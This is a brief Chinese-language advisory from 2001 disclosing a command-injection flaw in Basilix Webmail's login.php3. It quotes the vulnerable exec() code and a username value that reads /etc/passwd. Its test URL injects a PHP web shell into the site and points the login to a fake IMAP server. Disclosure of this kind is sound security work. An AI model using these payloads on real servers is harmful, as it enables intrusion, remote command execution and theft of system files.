Basilix Webmail 系统存在命令可执行漏洞发布时间:2001-09-04 更新时间:2001-09-04 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Basilix 1.0.2/3 series详细描述 Baslilix WEBMAIL系统允许远程用户执行任意命令,问题代码存在于login.php3中: $atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username"; . . . $mkcmd = "/bin/mkdir -p $atch_dir"; @exec($mkcmd); 我们可以传递如下用户名如:username=blah;cat%20/etc/passwd,不过这种情况会失败,因为脚本尝试连接imap服务器和使用用户名和密码进行认证,要通过这个验证,我们必须设置一伪造的imap服务器。 测试代码 victim.host/basilix.php3?username=blah;echo%20"<?system(\$cmd);?>">js/blah.php&password=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=blah.com.pl&bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_tick&nocookie=1&BSX_TestCookie=1&SESSID=1 解决方案 尚无 相关信息 Karol Wiesek - appelast<appelast@cdp.pl> |
